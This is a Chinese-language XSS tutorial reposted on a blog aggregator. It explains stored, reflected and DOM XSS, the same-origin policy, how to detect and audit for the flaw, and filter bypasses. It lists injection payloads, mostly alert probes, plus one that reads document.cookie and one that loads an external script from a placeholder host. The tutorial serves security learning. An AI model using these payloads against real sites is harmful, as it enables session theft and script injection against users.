XSS详解

这篇具有很好参考价值的文章主要介绍了XSS详解。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

xss原理

xss跨站脚本攻击,攻击者通过往web页面里插入恶意的script代码,当用户浏览页面时,嵌入web页面里的script代码就会被执行,从而达到攻击的目的。xss攻击是针对用户层面的。

xss分类

存储型,反射型,DOM型

存储型xss:存储型xss,持久化代码是存储在服务器中的
反射型xss:非持久化,需要欺骗用户自己去点击链接才能触发xss代码,一般容易出现在搜索界面。反射型xss大多数是用来盗取用户的cookie信息
DOM型xss:不经过后端,DOM-XSS漏洞基于文档对象模型的一种漏洞。是通过url传入参数去控制触发的。其实也属于反射型xss。

XSS能做什么

1、盗取Cookie并发送(用的最频繁的) , document.cookie —— 读取cookie,AJAX【核心是默认异步执行机制,依靠JS】发送数据
2、获取内网ip(攻击内网、扫描内网)
3、获取浏览器保存的明文密码
4、截取网页屏幕
5、网页上的键盘记录

检测XSS

<script>alert(1)</script>
XSS的常用语句,刷新之后若有弹窗,说明存在XSS。

XSS核心 —同源策略

同源策略:同域名|IP、同端口、同协议 。

浏览器的同源策略,认为同一个网站,访问同一个东西,限制了不同源的Js,对当前页面的资源和属性的权限。同源策略保护了a.com域名下的资源不被来自其他网页的脚本读取或篡改。

同源:

http://www.baidu.com
http://14.215.177.39

https://a.b.c
https://a.b.c/abc    

不同源

http://a.gyy.cn   => a.gyy.cn
http://b.gyy.cn   => b.gyy.cn

https://a.b.c  => https:       //443端口
http://a.b.c   => http:        //80端口

XSS攻击载荷

script标签

<script>alert("hello")</script>     #弹出hello
<script>alert(/hello/)</script>      #弹出hello
<script>alert(1)</script>              #弹出1,数字可以不用引号
<script>alert(document.cookie)</script>      #弹出cookie
<script src=http://xxx.com.sxx.js></script>  #引用外部xss

svg标签

<svg onload=alert(1)>
<svg onload=alert(1)//  #所有的标签>都可以用//替换

img标签

<img src=1 onerror=alert("hello")>
<img src=1 onerror=alert(document.cookie)>

body标签

<body onload=alert("hello")>
<body onpageshow=alert(1)>

video标签

<video onloadstart=alert(1) src="/xx/xx"/>

style标签

<style onload=alert(1)></style>

XSS漏洞的挖掘

黑盒测试

尽可能找到用户可控并且能够输出在页面的地方,比如:url的参数,表单,搜索框

白盒测试(代码审计)

代码审计主要是从接受参数的地方和一些关键词入手。

例如:
接收参数的get,post进行跟踪,看看是否这些参数有在界面进行输出,在看这些输出在界面的数据是否进行了过滤和编码等。

关键词echo等输出语句,跟踪这些语句的来源,是否能够进行控制。取数据的时候是否进行了过滤或者编码等

审计DOM型注入的时候可以搜索一些js操作dom元素的词

XSS攻击过程

存储型xss

1、A 是个WEB站点,可以发布、浏览、评论文章
2、攻击者检测到A站点具有存储型XSS漏洞
3、攻击者在A站点上发布了具有恶意脚本的文章存入到服务器上
4、普通用户浏览攻击者发布的文章,恶意脚本就会执行
5、恶意脚本执行后,攻击者就可以对浏览器该页面的用户发动xss攻击

数据流向:客户端->服务端->数据库->服务端->客户端

标题反射型xss:

1、A通过用户名/密码登录一个网站,此网站存储了A的敏感信息(用户名,密码,身份证等信息)
2、攻击者发现此网站存在xss反射型漏洞
3、攻击者编写了恶意脚本做成链接诱导A点击
4、A浏览了攻击者的链接恶意脚本在A的浏览器中执行,就窃取了A的敏感信息,然后再A不知情的情况下将信息发送给攻击者

数据流向:客户端->服务端->客户端

DOM型xss

数据流向:客户端->浏览器

XSS绕过技巧

大小写绕过
关键字嵌套绕过
使用过滤之外的关键字

示例:

XSS详解文章来源地址https://www.toymoban.com/news/detail-448151.html

到了这里,关于XSS详解的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 网络安全的行业黑话 ——攻击篇 之攻击者

    黑产 网络黑产,指以互联网为媒介,以网络技术为主要手段,为计算机信息系统安全和网络空间管理秩序,甚至国家安全、社会政治稳定带来潜在威胁(重大安全隐患)的非法行为。 例如非法数据交易产业。 暗网 暗网是利用加密传输、P2P对等网络、多点中继混淆等,为用户

    2024年02月08日
    浏览(58)
  • 网络安全事件调查,如何追溯攻击者的行踪和攻击路径

    在当今互联网的世界里,网络安全已成为一个非常重要的话题。随着网络攻击的不断增加,如何保护我们的网络安全已成为一个严峻的挑战。为了防止网络攻击,需要了解攻击者的行踪和攻击路径,以便更好地预防和应对网络攻击。 网络安全事件调查是一项非常重要的工作,

    2024年02月08日
    浏览(54)
  • 跨站脚本攻击XSS

    XSS又叫CSS (CrossSiteScript),因为与层叠样式表(css)重名,所以叫Xss,中文名叫跨站脚本攻击。 xss攻击,主要就是攻击者通过“html注入”篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击方式。 危害 可以盗取用户Cookie 挂马(水坑攻击) 在用户经

    2024年02月15日
    浏览(53)
  • 跨站脚本攻击(XSS)

             XSS :Cross Site Scripting ,为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。在一开始的时候,

    2024年02月08日
    浏览(97)
  • XSS跨站脚本攻击漏洞

    XSS(跨站脚本攻击)是一种常见的网络安全漏洞,它允许攻击者在网站中植入恶意的脚本代码,当其他用户访问该网站时,这些脚本代码会在用户的浏览器中执行。这可能会导致严重的安全后果,比如窃取用户的敏感信息,欺骗用户,或者在用户的浏览器中执行恶意操作。

    2024年02月09日
    浏览(47)
  • XSS注入(跨站脚本攻击)

    今天学习一下xss注入 XSS注入漏洞又称为\\\"跨站脚本攻击(Cross Site Scripting)\\\",为了不和层叠样式表(Cascading Style Sheets,CSS)混淆,所以将跨站脚本攻击缩写为XSS。xss本质上是黑客通过对网页的HTML注入,篡改了原本服务器发给客户端的数据包,在其中插入了恶意的Script代码插入到网页

    2024年02月09日
    浏览(36)
  • XSS跨站脚本攻击及防护

    目录 一、初识XSS跨站脚本 1.1 XSS攻击概述 1.2 XSS漏洞攻击本质 1.3 XSS攻击的危害 1.4 XSS玫击原理 1.5 XSS攻击过程 1.6 XSS攻击特点(3) 1.6.1 间接攻击 1.6.2 可更正性 1.6.3 传播性强 二、XSS攻击与防护 2.1 XSS攻击分类 2.1.1 存储型XSS 2.1.2 反射型XSS 2.1.3 DOM型XSS 2.2 XSS攻击过程 2.2.1 存储型

    2024年02月11日
    浏览(54)
  • 【网络安全】跨站脚本攻击(XSS)

    专栏文章索引:网络安全 有问题可私聊:QQ:3375119339 目录 一、XSS简介 二、XSS漏洞危害 三、XSS漏洞类型 1.反射型XSS 2.存储型XSS 3.DOM型XSS 四、XSS漏洞防御 XSS(Cross-Site Scripting) XSS 被称为跨站脚本攻击,由于和CSS重名,所以改为XSS。 XSS 主要使用 javascript , javascript 可以非常灵

    2024年04月28日
    浏览(52)
  • 【网络安全】跨站脚本(xss)攻击

    跨站点脚本(也称为 XSS)是一种 Web 安全漏洞,允许攻击者破坏用户与易受攻击的应用程序的交互。它允许攻击者绕过同源策略,该策略旨在将不同的网站彼此隔离。跨站点脚本漏洞通常允许攻击者伪装成受害者用户,执行用户能够执行的任何操作,并访问用户的任何数据。

    2024年02月11日
    浏览(38)
  • 网络安全——XSS跨站脚本攻击

    一、XSS概述 1、XSS被称为跨站脚本攻击,由于和CSS重名,所以改为XSS; 2、XSS主要基于JavaScript语言完成恶意的攻击行为,因为JavaScript可以非常灵活的操作html、CSS和浏览器 3、原理: XSS就是通过利用网页开发时留下的漏洞(由于Web应用程序对用户的输入过滤不足),巧妙的将恶

    2024年02月16日
    浏览(41)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包